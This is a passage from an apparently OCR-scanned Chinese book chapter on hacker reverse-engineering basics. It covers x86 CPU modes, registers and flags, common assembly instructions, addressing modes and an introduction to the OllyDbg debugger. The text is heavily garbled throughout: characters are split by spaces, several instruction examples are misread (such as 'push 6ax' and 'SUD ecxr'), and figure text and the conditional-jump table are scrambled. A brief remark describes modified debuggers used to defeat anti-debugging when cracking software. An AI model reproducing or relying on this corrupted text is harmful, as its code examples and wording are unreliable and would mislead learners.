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种 寄存 器 。 

1. CPU 工作 模式 

x86 体系 的 CPU 有 两 种 基本 的 工作 模式 ， 分 别 是 实 模式 和 保护 模式 。 

实 模式 也 称 为 实地 址 模式 ， 实 现 了 Intel 8086 处 理 器 的 程序 设计 环境 。 该 模式 被 早期 的 
Win 9x 和 DOS 所 文 持 。 实 模式 下 可 以 访问 的 内 存 为 MB。 实 模式 可 以 直接 访问 硬件 ， 比 如 
直接 对 端口 进行 操作 ， 对 中 断 进行 操作 。 现 在 的 CPU 仍然 支持 实 模式 ， 一 是 为 了 与 早期 的 
CPU 架构 保持 兼容 ， 二 是 因为 所 有 的 x86 架构 处 理 器 都 是 从 实 模式 引导 起 来 的 。 

保护 模式 是 处 理 器 主要 的 工作 模式 ，Linux 和 Windows NT 内 核 的 系统 都 工作 在 x86 的 
保护 模式 下 。 保 护 模 式 下 ， 每 个 进程 可 以 访问 的 内 存 地 址 为 4GB， 且 进程 间 是 隔离 的 。 

实 模式 和 保护 模式 之 间 的 区 别 绝 不 仅仅 是 上 面 介绍 的 这 么 简单 ， 但 是 对 于 入 门 而 言 ， 了 
解 上 面 的 内 容 已 经 够 了 。 

2. 基本 寄存 器 介绍 

寄存 器 是 CPU 内 部 的 高 速 存 储 单元 ， 访 问 速度 比 内 存 快 得 多 ， 而 价格 也 高 很 多 〈 在 单位 
价格 内 ， 寄 存 器 的 价格 要 比 内 存 贵 ， 内 存 要 比 硬盘 贵 )。CPU 中 ， 常 用 的 寄存 器 分 为 4 类 ， 分 
别 是 8 个 通用 寄存 器 、6 个 段 寄存 器 、1 个 标志 寄存 器 和 1 个 指令 指针 寄存 器 ， 如 图 5-1 所 示 。 

(1) 通用 寄存 器 

通用 寄存 器 主要 用 于 各 种 运算 和 数据 的 传送 ， 每 个 寄存 器 都 可 以 作为 一 个 32 位 、16 位 
或 8 位 来 使 用 ， 如 图 5-2 所 示 。 





32 位 通用 寄存 器 
数据 存储 器 指针 、 变 址 寄存 器 


32 位 标志 寄存 器 
16 位 段 寄存 器 
J 


ES 
| 32 位 指 信 指针 寄存 吕 于 
ee | 


图 5-1 x86 处 理 器 的 基本 寄存 器 图 5-2 通用 寄存 器 示意 图 (一 ) 
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对 于 图 5-2 来 说 ， 可 以 将 一 个 寄存 器 分 别 当 8 位 、16 位 或 32 位 来 使 用 。EAX 寄存 器 可 以 存 
储 32 位 的 数据 。EAX 的 低 16 位 可 以 表示 为 AX， 可 以 存储 16 位 的 数据 。AX 寄存 器 又 可 分 为 
AH 和 AL 两 个 8 位 的 寄存 器 ，AH 对 应 AX 寄存 器 的 高 8 位 ，AL 对 应 AX 寄存 器 的 低 8 位 。 

只 有 数据 存储 寄存 器 可 以 按照 这 样 的 方式 进行 使 用 。 由 图 5-1 可 知 ， 数 据 存 储 寄存 器 有 
EAX、EBX、ECX 和 EDX 4 个 。 

(2) 通用 寄存 器 的 使 用 方式 及 特殊 用 途 

指针 变 址 寄存 器 可 以 按照 32 位 或 16 位 进行 使 用 ， 如 图 5-3 所 示 。 











5.1 x86 汇编 语言 介绍 











对 于 图 5-3 来 说 ， 只 可 以 将 一 个 寄存 器 分 为 32 位 或 16 位 进行 使 用 。ESI 寄存 器 可 以 存 
储 32 位 的 指针 ， 其 中 低 16 位 可 以 表示 为 SI， 存 储 16 位 的 指针 ， 但 是 无 法 像 AX 那样 能 拆 
分 成 高 8 位 和 低 8 位 。 

各 通用 寄存 器 可 以 使 用 的 方式 如 图 5-4 所 示 。 





图 5-3 通用 寄存 器 示意 图 (二 ) 


关于 通用 寄存 器 中 有 部 分 寄存 器 有 特殊 用 途 : 

@ EAX 在 乘法 和 除法 指令 中 被 自动 使 用 ; 

@ CPU 自动 使 用 ECX 作为 循环 计数 器 ; 

@ ESP 寻 址 堆栈 〈 准 确 地 讲 ， 应 该 是 栈 ， 其 实 “ 堆 ”是 “ 堆 ””“ 栈 ”是 “ 栈 ”， 就 如 同 
“刀剑 ”虽然 合 起 来 称呼 ， 其 实 是 两 种 不 同 的 兵器 ) 上 的 数据 ，ESP 寄存 器 一 般 不 参与 算数 运 
算 ， 通 常 称 为 栈 指针 寄存 器 ; 

@ ESI 和 EDI 通常 用 于 内 存 数据 的 高 速 传送 ， 被 称 为 源 指 针 寄 存 器 和 目的 指针 寄存 器 ; 

@ EBP 由 高 级 语言 用 来 引用 参数 和 局 部 变量 ， 通 常 被 称 为 栈 帧 基 址 指针 寄存 器 。 

(3) 指令 指针 寄存 器 

指令 指针 寄存 器 EIP 是 一 个 32 位 的 寄存 器 。 在 16 位 的 环境 中 ， 其 名 称 为 卫 。EIP 寄存 
器 通常 保存 着 下 一 条 要 执行 的 指令 的 地 址 。 下 一 条 指令 的 地 址 为 当前 指令 的 地 址 加 当前 指令 
的 长 度 。 

特殊 (其 实 也 算 不 上 通常 与 特殊 ) 情况 是 当前 指令 为 一 条 转移 指令 ， 比 如 JMP、 正 、LOOP 
等 指令 , 会 改变 EIP 的 值 ， 导 致 CPU 执行 指令 产生 跳跃 性 执行 ， 从 而 构成 分 文 与 循环 的 程序 
结构 。 

EIP 中 的 值 始终 在 引导 CPU 的 执行 。 

(4) 段 寄存 器 

段 寄 存 器 被 用 于 存放 段 的 基地 址 ， 段 是 一 块 预 分 配 的 内 存 区 域 。 有 些 段 存放 有 程序 的 指 
令 ， 有 些 则 存放 有 程序 的 变量 ， 另 外 还 有 其 他 的 段 ， 如 堆栈 段 存 放 着 函数 变量 和 函数 参数 等 。 
在 16 位 CPU 中 ， 段 寄存 器 只 有 4 个， 分 别 是 CS 代码 段 )、DS (数据 段 )、SS 堆 栈 段 ) 
和 ES〔 附 加 段 )。 

在 32 位 CPU 中 ， 段 寄存 器 从 4 个 扩展 为 6 个 ,， 分别 是 CS、DS、SS、ES、FS 和 GS。 
FS 和 GS 段 寄存 器 也 属于 附加 的 段 寄存 器 。 

。 注 : 32 位 CPU 的 保护 模式 下 ， 段 寄存 器 的 使 用 与 概念 完全 不 同 于 16 位 CPU。 由 于 该 部 分 较为 复杂 ， 请 
具体 参考 Intel x86 手册 和 相关 知识 。 
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(5) 标志 寄存 器 
在 16 位 CPU 中 ， 标 志 寄 存 器 称 为 FLAGS (有 的 书 上 是 PSW， 即 程序 状态 字 寄 存 器 )。 
在 32 位 CPU 中 ， 标 志 寄 存 器 也 随 之 扩展 为 32 位 ， 被 称 为 EFLAGS。 

关于 标志 寄存 器 ，16 位 CPU 中 的 标志 已 经 满足 于 日 常 的 程序 设计 所 用 ， 这 里 主要 介绍 
16 位 CPU 中 的 标志 。 标 志 寄 存 器 如 图 5-5 所 示 。 





图 5-5 16 位 的 标志 寄存 器 


5-5 说 明 ; 标志 寄存 器 中 的 每 一 个 标志 位 只 占 1 位 ,而 16 位 的 标志 寄存 器 并 没有 全 部 
使 用 。16 位 的 标志 寄存 器 分 为 两 部 分 ， 分 别 是 条 件 标 志和 控制 标志 。 

条 件 标志 寄存 器 说 明 如 下 。 

Q) OF (Overflow Flag): 溢出 标志 位 ， 洲 出 时 为 1， 否 则 为 0。 

@@ SF (Sign Flag): 符号 标志 ， 运 算 结果 为 负 时 ， 为 1， 否则 为 0。 

@) ZF (Zero Flag): 截标 志 ， 运 算 结果 为 0 时 ， 为 1， 否则 为 0。 

由 (Auxiliary carry Flag): 辅助 进位 标志 ， 记 录 运 算 时 第 3 位 〈 半 字 节 ) 产生 的 进位 ， 
有 进位 时 为 1， 和 否则 为 0。 

@ (Parity Flag): 奇偶 标志 ， 结 果 操 作 数 中 1 的 个 数 为 偶数 时 ， 为 1， 否则 为 0。 

@) CF (Carry Flag): 进位 标志 ， 产 生 进位 时 为 1， 否则 为 0。 

控制 标志 寄存 器 说 明 如 下 。 

Q) DF (Direction Flag): 方向 标志 ， 在 串 处 理 指令 中 用 于 控制 方向 。 

@) IF (Interrupt Flag): 中 断 标 志 。 

(3) TF 〈Trap Flag): 陷阱 标志 。 

在 日 常 的 使 用 过 程 中 ， 较 为 常用 的 标志 有 CF、PF、ZF、SF、DF 和 OF。 


Ey 注 : 16 位 CPU 中 的 标志 在 32 位 CPU 中 继续 使 用 ，32 位 扩展 了 4 个 新 的 标志 位 。 


5.1.2 常用 汇编 指令 集 


当 对 软件 进行 逆向 反 汇 编 的 时 候 ， 面 对 的 都 是 一 行 行 汇编 指令 。 如 果 对 常用 的 汇编 指令 
不 熟悉 ， 那 么 需要 对 常用 的 汇编 指令 进行 学 习 ， 从 而 有 一 个 大 致 的 了 解 。 其 余 并 不 常用 或 者 
比较 生僻 的 指令 ， 完 全 可 以 通过 查 手 册 或 文档 来 学 习 。 在 看 书 时 ， 有 个 别 字 不 认识 还 能 继续 
看 下 去 :如果 只 有 个 别 字 是 认识 的 ， 慌 怕 就 太 困 难 了 。 看 汇编 指令 亦 是 如 此 。 

再 次 声明 ， 本 书 不 是 汇编 语言 书籍 ， 不 会 详细 介绍 汇编 语言 的 各 种 细节 。 

1. 数据 传送 指令 集 

数据 传送 指令 常用 的 有 5 条 ， 分 别 是 push、pop、mov、xchg 和 lea。 





CD 
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(1) mov 指令 

mov 指令 是 最 常见 的 数据 传送 指令 , 类 似 于 高 级 语言 中 的 赋值 语句 。 该 指令 有 两 个 参数 ， 
分 别 是 源 操 作 数 和 目的 操作 数 。 

格式 如 下 : 

mov 目的 操作 数 ， 源 操作 数 

mov 指令 可 以 实现 寄存 器 与 寄存 器 之 间 、 寄 存 器 与 内 存 之 间 、 寄 存 器 与 立即 数 、 内 存 与 立即 
数 的 数据 传递 。 需 要 注意 的 是 ， 内 存 与 内 存 无 法 直接 传递 数据 ， 目 的 操作 数 不 能 为 立即 数 。 

mov 指令 的 用 法 示例 如 下 : 


mov eax, 12345678h 

mov eax, [00401000h] 

mov eax, ebx 

mov [00401000h], 12345678h 
mov [00401000h], eax 


(2) xchg 指令 

xchg 指令 的 功能 是 交换 两 个 操作 数 的 数据 。 该 指令 有 两 个 参数 ,分 别 是 源 操作 数 和 目的 
操作 数 。 

格式 如 下 : 

xchg 目的 操作 数 ， 源 操作 数 

xchg 指令 的 用 法 示例 如 下 : 

XChg eax, ‘ebx 


xchg [00401000h], eax 
xchg eax, [00401000h] 


(3) push 和 pop 指令 

push 指令 和 pop 指令 互 为 相反 的 操作 指令 。push 指令 的 功能 是 将 操作 数 压 入 堆栈 ，pop 
指令 的 功能 是 将 栈 顶 的 操作 数 弹 出 。 

格式 如 下 : 

。 push 操作 数 ; 

。 pop 操作 数 。 

push 和 pop 指令 的 用 法 示例 如 下 : 


(1) push 6ax / pop eax 
(2) push 12345678h / pop eax 
(3) push [00401000h] / pop [00401004h] 


push 指令 把 一 个 32 位 的 操作 数 送 入 堆栈 ， 该 操作 致使 esp 寄存 器 的 值 减 4。esp 寄存 器 
始终 指向 栈 顶 。 扒 栈 的 方向 是 由 高 地 址 向 低地 址 进行 延伸 ， 也 就 是 执行 的 push 次 数 越 多 ，esp 寄 
存 器 指向 的 地 址 越 小 。 在 32 位 平台 上 ， 每 执行 一 次 push 指令 ，esp 指向 的 地 址 都 减 小 4 字 节 。 

pop 指令 把 esp 指向 地 址 〈 栈 项 ) 中 的 值 送 入 寄存 器 或 内 存 中 ， 然 后 esp 指向 的 地 址 加 4 
字 节 。 执 行 的 pop 指令 越 多 ，esp 寄存 器 指向 的 地 址 越 大 。 

(4) lea 指令 

lea 指令 ， 即 装 入 有 效 地 址 的 意思 。 它 的 操作 数 就 是 地 址 ， 而 不 是 具体 的 数据 。 这 是 lea 
指令 与 mov 指令 的 区 别 。 

格式 如 下 : 

lea 目的 操作 数 ， 源 操作 数 


言 拙 可 注 史 钵 ” 需 吕 梁 
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lea 指令 的 用 法 示例 如 下 : 


lea edi, [ebp + 0000000eh] 

2. 算术 运算 指令 

算术 运算 指令 在 这 里 只 介绍 常用 且 易 学 的 6 条 指令 , 分 别 是 add、sub、adce、sbb、inc 和 dec。 

(1) add 指令 

add 指令 是 加 法 指令 ， 将 源 操作 数 与 目的 操作 数 相 加 ， 结 果 存 储 在 目的 操作 数 中 。 操 作 
数 的 长 度 必须 相同 。 

格式 如 下 : 

add 目的 操作 数 ， 源 操作 数 

add 指令 的 用 法 示例 如 下 : 

add eax, sb 到 

QQeaan 出 

add [00402000h], edx 

(2) sub 指令 

sub 指令 是 减法 指令 ， 将 目的 操作 数 与 源 操作 数 相 减 ， 结 果 存 储 在 目的 操作 数 中 。 

格式 如 下 : 

sub 目的 操作 数 ， 源 操作 数 

sub 指令 的 用 法 示例 如 下 : 

sub eax, ebx 


SUD ecxr 于 
Sub to00402000n), edx 


(3) adc 指令 

adc 指令 是 带 进位 的 加 法 ， 类 似 于 add 指令 ， 区 别 在 于 将 目的 操作 数 与 源 操作 数 相 加 后 ， 
需要 再 加 上 CF 中 的 值 ,。 执行 adc 后 的 结果 为 目的 操作 数 = 目的 操作 数 + 源 操作 数 +CF 中 的 值 。 

格式 如 下 : 

adc 目的 操作 数 ， 源 操作 数 

adc 指令 的 用 法 示例 如 下 : 


adc eax, ebx 
Rac eax 省 
adc [00402000h], edx 


(4) sbb 指令 

sbb 指令 是 带 进位 的 减法 ， 类 似 于 sub 指令 ， 区 别 在 于 将 目的 操作 数 与 源 操作 数 相 减 后 ， 
需要 再 减 去 CF 中 的 值 。 执 行 sbb 后 的 结果 为 目的 操作 数 = 目的 操作 数 - 源 操作 数 -CF 中 的 值 。 

格式 如 下 : 

sbb 目的 操作 数 ， 源 操作 数 

sbb 指令 的 用 法 示例 如 下 : 

sbb eax, ebx 


sh eex,, 
sbb [00402000h], edx 


(5) inc 指令 

inc 指令 是 加 一 指令 ， 用 于 给 操作 数 进行 加 一 操作 。 
格式 如 下 : 

inc 目的 操作 数 








5.1 x86 汇编 语言 介绍 











inc 指令 的 用 法 示例 如 下 : 
ine eax 
inc dword ptr [00402000h] 


从 功能 上 讲 ，inc eax 指令 与 add eax, 1 指令 相同 ,但 是 inc 的 机 器 码 更 短 ， 执 行 速度 更 快 。 
(6) dec 指令 

dec 指令 是 减 一 指令 ， 用 于 给 操作 数 进行 减 一 操作 。 

格式 如 下 : 

dec 目的 操作 数 

dec 指令 的 用 法 示例 如 下 : 


DD. dec eax 
@ dec word ptr [00402000h] 


先 、 注 在 操作 内 存 时 ， 如 果 无 法 明确 内 存 长 度 ， 必 须 明确 指出 需要 操作 内 存 的 长 度 。dword ptr 表示 操作 的 内 
存 是 4 字 节 的 长 度 ，word ptr 表示 操作 的 内 存 是 2 字 节 的 长 度 ，byte ptr 表示 操作 的 内 存 是 1 字 节 的 长 度 。 
3. 位 运算 指令 
位 运算 指令 主要 介绍 位 与 位 之 间 的 逻辑 运算 指令 ,包括 and、or、not、xor 和 test 共 5 条 


(1) and 指令 
and 指令 是 逻辑 按 位 与 运算 指令 ， 用 于 将 目的 操作 数 中 的 每 个 数据 位 与 源 操作 数 中 的 对 


应 位 进行 逻辑 与 操作 。 


格式 如 下 : 

and 目的 操作 数 ， 源 操作 数 

该 指令 影响 的 标志 位 有 OF、SF、ZF、PF 和 CF。 

(2) or 指令 

or 指令 是 逻辑 按 位 或 运算 指令 ， 用 于 将 目的 操作 数 中 的 每 个 数据 位 与 源 操作 数 中 对 应 位 


进行 逻辑 或 操作 。 


格式 如 下 : 

or 目的 操作 数 ， 源 操作 数 

该 指令 影响 的 标志 位 有 OF、SF、ZF、PF 和 CF。 

(3) not 指令 

not 指令 是 求 反 指令 ， 通 过 将 操作 数 的 各 位 变 反 执行 逻辑 非 操 作 。 
格式 如 下 : 

not 目的 操作 数 

not 指令 的 用 法 示例 如 下 : 


not éax 


(4) xor 指令 
xor 指令 是 按 位 异 或 指令 ， 将 源 操作 数 的 每 位 与 目的 操作 数 的 对 应 位 进行 异 或 操作 。 只 


有 当 原 始 操作 数 的 数据 位 与 目的 操作 数 的 对 应 位 不 同时 ， 结 果 才 为 1。 


格式 如 下 : 
xor 目的 操作 数 ， 源 操作 数 









童 盯 了 圣 降 啊 酒 山 吕 小 











主 肝 可 谋 啊 钵 山 鼎 疏 


第 5 章 黑客 逆向 基础 





该 指令 影响 的 标志 位 有 OF、SF、ZF、PF 和 CF。 


(5) test 指令 


test 指令 是 测试 指令 ,测试 目的 操作 数 的 单个 位 。 该 指令 执行 逻辑 与 操作 ， 影 响 标 志 位 ， 


但 不 改变 目的 操作 数 的 内 容 。 
格式 如 下 : 
test 目的 操作 数 ， 源 操作 数 


该 指令 影响 的 标志 位 有 OF、SF、ZF、PF 和 ZF。 


4. 流程 控制 指令 


关于 指令 控制 流程 ， 这 里 将 介绍 常用 的 6 个 指令 ， 分 别 是 cmp、jmp、jcc、loop、call 和 ret。 


(1) cmp 指令 


cmp 是 比较 指令 ， 比 较 目 的 操作 数 和 源 操 作 数 ， 隐 含 执行 《相应 设置 标志 位 ， 但 不 改变 
目的 操作 数 ) 从 目的 操作 数 中 减 掉 源 操作 数 的 减法 操作 。 


格式 如 下 : 
cmp 目的 操作 数 ， 源 操作 数 


该 指令 影响 的 标志 位 有 OF、SF、ZF、AF、PF 和 CF。 


(2) jmp 指令 


jmp 是 无 条 件 跳 转 指 令 ， 会 无 条 件 跳 转 到 标号 指定 处 。 


格式 如 下 : 
jmp 跳 转 目标 
jmp 指令 的 用 法 示例 如 下 : 


jmp eax 
四 jmp target 
(3) jcc 指令 


jcc 指令 代表 条 件 跳 转 指令 。 注 意 这 里 说 的 是 代表 ， 而 不 是 具体 的 指令 。jcce 指令 是 一 个 
指令 集合 ， 包 括 jz、jnz、je、jne、ja、jna、jae 等 ， 如 图 5-6 所 示 。 


条 件 跳 转 指令 根据 标志 位 决定 如 何 进行 跳 
转 。 这 些 指 令 并 不 是 所 有 的 都 会 经 常 被 用 到 ， 因 
此 只 要 在 写 程序 的 时 候 留 意 和 掌握 经 常 使 用 的 即 
可 , 而 其 他 的 在 使 用 时 根据 图 5-6 选择 使 用 就 行 。 

(4) loop 指令 

loop 指令 是 循环 控制 指令 ， 需 要 ecx 寄存 器 
来 进行 计数 ， 当 执行 到 loop 指令 时 ， 先 将 ecx 寄 
存 器 中 的 值 减 1， 如果 ecx 大 于 0, 则 跳 转 到 loop 
指令 后 的 标号 处 。 

格式 如 下 : 

loop 目标 地 址 

(5) call 指令 

call 指令 是 过 程 调用 指令 ， 其 执行 过 程 是 先 


JB/JC/INAE 
JAE/JNB/ INC 
JE/ 了 2 


低 于 /进位 /不 高 于 等 于 
高 手 等 所/ 不 低 于 /无 进位 


2ZF=1 相等 /等 于 党 





JNEAJNZ 
JBEAJNA 
JA/ JNBE 


JNP/JPO 
IL/ BGE 


JLE/TNG 
JG/JNLE 


三 


图 5-6 jcc 指令 
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将 下 一 条 指令 的 地 址 压 入 堆栈 ， 并 将 控制 转移 到 目的 地 址 。 
call 指令 相当 于 执行 了 push eip 和 jmp 目的 地 址 两 条 指令 。 
格式 如 下 : 
call 目标 地 址 
(6) ret 指令 
ret 指令 是 过 程 返 回 指令 。 该 指令 从 堆栈 上 弹出 返回 地 址 ， 相 当 于 执行 了 pop eip 功能 的 


格式 如 下 : 


ret 


py 注 : jmp、loop、call 和 ret 指令 都 是 通过 改变 eip 寄存 器 来 改变 程序 的 执行 流程 的 。 但 是 切记 一 点 ，eip 
寄存 器 是 无 法 通过 指令 进行 明确 操作 的 ， 如 add eip, 1 之 类 的 指令 ， 只 有 通过 流程 控制 指令 来 改变 eip 寄 
存 器 的 值 才 是 被 CPU 运行 的 操作 。 


5.1.3 寻 址 方式 


在 程序 执行 的 过 程 中 ，CPU 会 不 断 处 理 数据 ， 而 CPU 处 理 的 数据 通常 来 自 于 3 个 地 方 : 
数据 在 指令 中 直接 给 出 ， 数 据 在 寄存 器 中 ， 数 据 在 内 存 中 。 而 在 编写 汇编 程序 时 ， 指 令 操 作 
的 数据 来 自 于 何 处 ，CPU 应 该 从 哪里 取出 数据 ， 是 一 个 较为 关键 的 问题 。 而 CPU 寻找 最 终 
要 操作 数据 的 过 程 被 称 为 “ 寻 址 ”。 

1. 指令 中 给 出 的 数据 

操作 数 直接 放 在 指令 中 ， 作 为 指令 的 一 部 分 存放 在 代码 里 ， 这 种 方式 称 为 立即 数 寻 址 。 
这 是 唯一 一 种 在 指令 中 给 出 数据 的 方式 。 

举例 代码 如 下 : 


mov eax, 12345678h 


2. 数据 在 寄存 器 中 

操作 数 在 寄存 器 中 存放 ， 在 指令 中 指定 寄存 器 名 即 可 ， 这 种 方式 称 为 寄存 器 寻 址 方式 。 
这 是 唯一 一 种 数据 在 寄存 器 中 给 出 的 方式 。 

举例 代码 如 下 : 


moV eaXr ecx 


3. 数据 在 内 存 中 

数据 在 内 存 中 存放 可 以 由 多 种 方式 给 出 ， 主 要 有 直接 寻 址 、 寄 存 器 间接 寻 址 、 变 址 寻 址 
和 基 址 变 址 寻 址 等 。 

e 直接 寻 址 方式 。 

在 指令 中 直接 给 出 操作 数 所 在 的 内 存 地 址 称 为 直接 寻 址 方式 ， 比 如 mov eax, [00402000h] 。 

。 寄存 器 间接 寻 址 方式 。 

操作 数 的 地 址 由 寄存 器 给 出 ， 这 里 指 的 地 址 是 内 存 地 址 ， 则 实际 的 操作 数 在 内 存 中 存储 ， 
比如 mov eax, [eax] 。 

。 其 他 方式 。 

除了 立即 寻 址 和 寄存 器 寻 址 外 ， 其 余 的 寻 址 方式 所 寻找 的 操作 数 均 在 内 存 当 中 。 除 了 直 
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接 寻 址 和 寄存 器 寻 址 外 ， 还 有 寄存 器 相对 寻 址 、 寄 存 器 间接 寻 址 、 变 址 寻 址 、 基 址 变 址 寻 址 、 
比例 因子 寻 址 等 。 这 里 就 不 再 一 一 进行 介绍 了 。 

关于 汇编 的 知识 就 介绍 到 这 里 ， 以 上 的 知识 基本 上 可 以 满足 阅读 简单 的 汇编 程序 。 而 在 
逆向 的 时 候 ， 读 汇编 指令 的 机 会 比较 多 一 些 ， 而 可 能 用 汇编 写 程序 的 机 会 相对 会 少 一些 。 


ey 注 : 要 自行 学 习 一 个 汇编 指令 ， 至 少 需要 掌握 指令 的 参数 、 影 响 的 标志 位 和 指令 支持 的 寻 址 方式 。 如 果 更 

深入 地 掌握 一 条 汇编 指令 ， 就 需要 掌握 指令 消耗 的 CPU 时 间 、 指 令 机 器 码 的 长 度 。 对 于 指令 消耗 的 CPU 
时 间 来 说 ， 对 程序 进行 优化 时 会 用 到 。 而 掌握 指令 的 长 度 会 用 在 某 些 苛刻 的 环境 中 。 比 如 缓冲 区 溢出 技术 
中 ,为 了 解决 缓冲 区 小 的 情况 ， 需 要 使 用 更 短 字 节 码 的 汇编 指令 。 


无 论 怎么 样 ， 想 要 在 逆向 相关 领域 有 一 定 的 发 展 ， 就 必须 深入 学 习 和 掌握 汇编 语言 及 底 
层 的 相关 知识 。 


5.2 逆向 调试 分 析 工 具 


在 逆向 分 析 中 , 调试 工具 可 以 说 是 非常 重要 的 。 调试 器 能 够 跟踪 一 个 进程 的 运行 时 状态 ， 
在 逆向 中 称 为 动态 分 析 工 具 。 动态 调试 会 用 在 很 多 方面 ， 比 如 漏洞 的 挖掘 、 游 戏 外 挂 的 分 析 、 
软件 加 密 解 密 等 方面 。 本 节 主 要 介绍 应 用 层 下 最 流行 的 调试 工具 OllyDbg。 

OllyDbg 缩写 为 OD， 是 由 一 款 具有 可 视 化 界面 的 运行 在 应 用 层 (或 者 R3) 的 一 款 32 位 
的 反 汇 编 逆 向 调试 分 析 工 具 。OD 是 所 有 做 逆向 分 析 者 都 离 不 开 的 工具 。 它 的 流行 ， 究 其 原 
因 ， 是 操作 简单 、 参 考 文档 相当 丰富 、 支 持 插件 功能 。 


5.2.1 OllyDbg 使 用 介绍 


在 真正 开始 逆向 调试 分 析 前 ， 先 来 介绍 帮助 程序 员 进 行 逆向 分 析 调 试 的 工具 。OD 的 使 
用 主要 介绍 其 常用 操作 界面 、 常 用 操作 快捷 键 和 一 些 常用 的 命令 。 

1. OD 的 选 型 

为 什么 先 介绍 OD 的 选 型 ， 而 不 直接 开始 介绍 OD 的 使 用 呢 ? OD 的 主流 版 本 是 1.10。 
虽然 它 的 主流 版 本 是 1.10， 但 是 它 存在 很 多 修改 版 。OD 虽然 是 动态 调试 工具 ， 但 是 由 于 其 
强大 的 功能 经 常 被 很 多 人 用 在 软件 破解 等 方面 ， 很 多 软件 作者 的 心血 被 付 诸 东 流 。 软 件 的 作 
者 为 了 防止 软件 被 OD 调试 ， 加 入 了 很 多 防止 OD 进行 调试 的 反 调 试 功能 来 保护 自己 的 软件 
不 被 破解 ， 而 破解 者 为 了 能 够 继续 使 用 OD 来 破解 软件 ， 则 不 得 不 对 OD 进行 修改 ， 从 而 达 
到 反 反 调试 的 效果 。 

调试 、 反 调试 、 反 反 调 试 ， 对 于 新 接触 调试 的 爱好 者 来 说 容易 混淆 。 简 单 来 说 ， 反 调试 
是 阻止 使 用 OD 进行 调试 ， 而 反 反 调试 是 突破 反 调试 继续 进行 调试 。 而 OD 的 修改 版 本 之 所 
以 很 多 ， 就 是 为 了 能 够 更 好 地 突破 软件 的 反 调 试 。 从 OD 存在 着 众多 的 修改 版 本 可 以 看 出 ， 
软件 的 保护 与 软件 的 破解 一 直 在 进行 着 “ 攻 ” 和 “ 防 ” 的 突破 当中 。 

因此 ， 如 果 从 学 习 的 角度 来 讲 ， 建 议 选择 原版 的 OD 进行 使 用 。 在 使 用 的 过 程 中 ， 除 了 
会 掌握 很 多 调试 的 技巧 ， 也 会 学 到 很 多 反 调 试 的 技巧 ， 从 而 掌握 反 反 调试 的 技巧 。 而 如 果 在 
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实际 的 应 用 中 ， 则 可 以 直接 使 用 修改 版 的 OD， 避 免 OD 被 软件 反 调试 ， 从 而 提高 逆向 调试 
人 
.熟悉 OD 主 界面 
Ar 解压 即 可 运行 使 用 。 运 行 OD 解压 目录 中 的 ollydbg.exe 程序 ， 
会 出 现 一 个 分 布 恰当 、 有 菜单 有 版 面 和 能 输入 命令 的 一 个 看 似 强大 的 软件 窗口 , 如 图 5-7 所 示 。 
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图 5-7 OD 调试 主 界面 


在 图 5-7 中 ， 工 作 区 可 以 分 为 6 部 分 ， 从 左 往 右 、 从 上 往 下 ， 这 6 部 分 分 别 是 反 汇 编 窗 

、 信 息 窗口 、 数 据 窗口 、 寄 存 器 窗口 、 栈 窗口 和 命令 窗口 。 下 面 分 别 介绍 各 个 窗口 的 用 法 。 

反 汇 编 窗口 : 该 窗口 用 于 显示 反 汇 编 代 码 ， 调 试 分 析 程 序 主要 就 是 在 这 个 窗口 中 进行 ， 
这 也 是 进行 调试 分 析 的 主要 工作 窗口 。 

言 息 窗 口 : 该 窗口 用 于 显示 与 反 汇 编 窗口 上 下 文 相关 的 内 存 或 寄存 器 信息 。 

数据 窗口 : 该 窗口 用 于 以 多 种 格式 显示 内 存 中 的 内 容 ， 可 以 使 用 的 格式 有 Hex、 文 本 、 
短 型 、 长 型 、 浮 点 和 反 汇 编 等 。 

寄存 器 窗口 : 该 窗口 用 于 显示 各 个 寄存 器 的 内 容 ， 包 括 前 面 介绍 的 通用 寄存 器 、 段 寄存 
器 、 标 志 寄 存 器 、 浮 点 寄存 器 ， 另 外 ， 还 可 以 在 寄存 器 窗口 中 的 右键 菜单 选择 显示 MMX 寄 
存 器 、3DNow! 寄 存 器 和 调试 寄存 器 。 

栈 窗口 : 该 窗口 用 于 显示 堆栈 内 容 ， 即 ESP 寄存 器 和 EBP 寄存 器 指向 的 地 址 部 分 。 

命令 窗口 : 该 窗口 用 于 输入 命令 来 简化 调试 分 析 的 工作 ， 该 窗口 并 非 基本 窗口 ， 加 
由 OD 的 插件 提供 的 功能 ， 几 乎 所 有 的 OD 使 用 者 都 会 使 用 该 控件 ， 因 此 必须 掌握 该 
的 使 用 。 

熟悉 OD 功能 窗口 

OD 中 的 主 窗 口 是 OD 众多 窗口 中 的 一 个 ， 主 要 是 用 来 显示 CPU 相关 内 容 的 窗口 ， 主 窗 
口 也 被 称 为 CPU 窗口 。 除 了 CPU 窗口 外 ，OD 还 有 功能 非常 多 的 其 他 窗口 。 可 以 通过 菜单 
栏 的 “查看 (V)” 项 目 打 开 这 些 窗口 进行 使 用 ， 或 者 通过 工具 栏 上 的 “窗口 切换 ”工具 来 选择 
使 用 不 同 的 功能 窗口 。 工 具 栏 的 “窗口 切换 ”如 图 5-8 所 示 。 
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a i 抽出 | 网 | 国 | 抽出 | 恒 | 网 风 | 出 出 | 琶 | 筷 
“内 存 ” 窗 口 显示 了 程序 各 个 模块 节 区 在 内 存 中 的 We 


地 址 ， 如 图 5-9 所 示 。 
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图 5-9 “内 存 ” 窗 口 


在 内 存 窗口 中 ， 可 以 用 鼠标 选中 某 个 模块 的 节 区 ， 然 后 按 下 F2 键 来 下 断 点 。 一 旦 代码 
访问 到 这 个 段 ，OD 就 会 相应 断 点 断 下 。 

(2)“ 调 用 堆栈 ”窗口 

“调用 堆栈 ”用 来 显示 当前 代码 所 属 函数 的 调用 关系 。“ 调 用 堆栈 ”窗口 如 图 5-10 所 示 。 
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图 5-10 “调用 堆栈 ”窗口 


从 图 5-10 中 第 1 行 信息 可 以 看 出 ， 当 前 代码 所 在 的 函数 首 地 址 是 NOTEPAD 模块 中 的 
010040BA 地 址 处 ， 调 用 该 函数 的 位 置 来 自 于 NOTEPAD.010045CA， 而 NOTEPAD.010045CA 
函数 所 在 的 函数 首 地 址 需要 从 第 3 行 中 查看 ， 该 函数 的 首 地 址 是 NOTEPAD.01004565。 其 调 
用 关系 模拟 如 下 : 


Func 01004565 () 


sense 


010045CA: call 010040BA 
} 


Func 010040BA () 
{ 


} 
各 个 调用 关系 之 间 的 Arg1、Arg2 是 由 调用 方 函数 传递 给 被 调用 方 的 函数 参数 。 调 用 栈 
